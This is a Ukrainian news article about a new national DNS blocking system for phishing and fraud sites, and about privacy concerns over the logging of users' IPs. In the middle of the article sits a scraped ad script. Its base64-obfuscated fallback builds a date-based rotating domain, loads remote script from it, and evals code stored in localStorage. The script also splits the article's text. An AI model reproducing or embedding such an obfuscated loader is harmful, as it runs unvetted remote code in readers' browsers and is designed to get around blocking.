Національний центр оперативно-технічного управління мережами телекомунікацій (НЦУ) ввів у дію автоматизовану систему блокування інтернет-сайтів в українському сегменті інтернету. Система покликана виявляти й блокувати домени з фішингом, тобто шахрайські, хакерські ресурси.
Про це повідомляє повідомляє Dev.ua.
Ініціативу НЦУ відразу розкритикували в Інтернет-асоціації України, зазначивши, що якщо над нею отримають контроль російські окупанти, то зможуть блокувати будь-які неугодні їм інформаційні сайти або підміняти їх своїми, та й українська влада може почати блокувати незручні для них ресурси.
І, мабуть, найголовніша претензія — під час спроби заходу на заборонений сайт провайдер фіксує IP-користувача, час заходу й передає ці дані «у відповідні державні органи». Досі немає точної відповіді, для чого збирається подібна інформація про користувача.
Як працює система блокування
Блокування відбувається класичним способом за допомогою провайдерів DNS-серверів. Кожні 15 хвилин провайдери отримують так звані «стоп-листи» й блокують сайти, що перебувають у них. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Кожен із нас, користуючись будь-яким провайдером, підключений до його DNS-сервера, завдання якого в перетворенні імен сайтів на їхні IP-адреси. Насправді провайдери вже давно блокують шкідливі сайти, наприклад, у свіжому реєстрі НЦУ міститься 709 імен усіляких шахрайських інтернет-казино.
Тепер система почне блокувати й сайти, спрямовані на фішинг і шахрайство в банківській сфері. Не йдеться про блокування пропаганди, торентів чи сайтів із піратським ПЗ. Банківський фішинг — одна з найбільших небезпек у сучасному інтернеті, і шахраї створюють безліч підроблених ресурсів, які зовнішнім виглядом нагадують справжні сторінки банків і заманюють на них своїх жертв, щоб виманити персональні дані й отримати доступ до їхніх грошей. Наприклад, найбільше кіберзлочинці облюбували «розведення» на тему «Приватбанку» та програми e-dopomoga.
Складання списків відбувається завдяки роботі команді реагування на кіберзагрози НБУ, яка, зі свого боку, бере інформацію від СБУ та CERT-UA Держспецзв’язку. Використовуються повідомлення про фішинг і від самих користувачів інтернету — такі сайти перевіряються та вносяться до списку блокування. Якщо ж власник сайту вважає, що його ресурс помилково потрапив у «стоп-лист», то він може надіслати заявку на розблокування.
Утім, ніякої обов’язковості щодо підключення до цього сервісу немає, і провайдери можуть за своїм бажанням підключитися до подібних «стоп-листів». За словами голови ІнАУ Олександра Савчука, більшість провайдерів уже зареєструвалися в системі від НЦУ. (adsbygoogle = window.adsbygoogle || []).push({});
4 види повісток: детально про мобілізацію в Україні Підписуйтесь на Акцент в 
Источник: https://akzent.zp.ua/v-ukrayini-pochala-pratsyuvati-sistema-blokuvannya-sajtiv-i-zboru-danih-koristuvachiv/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook
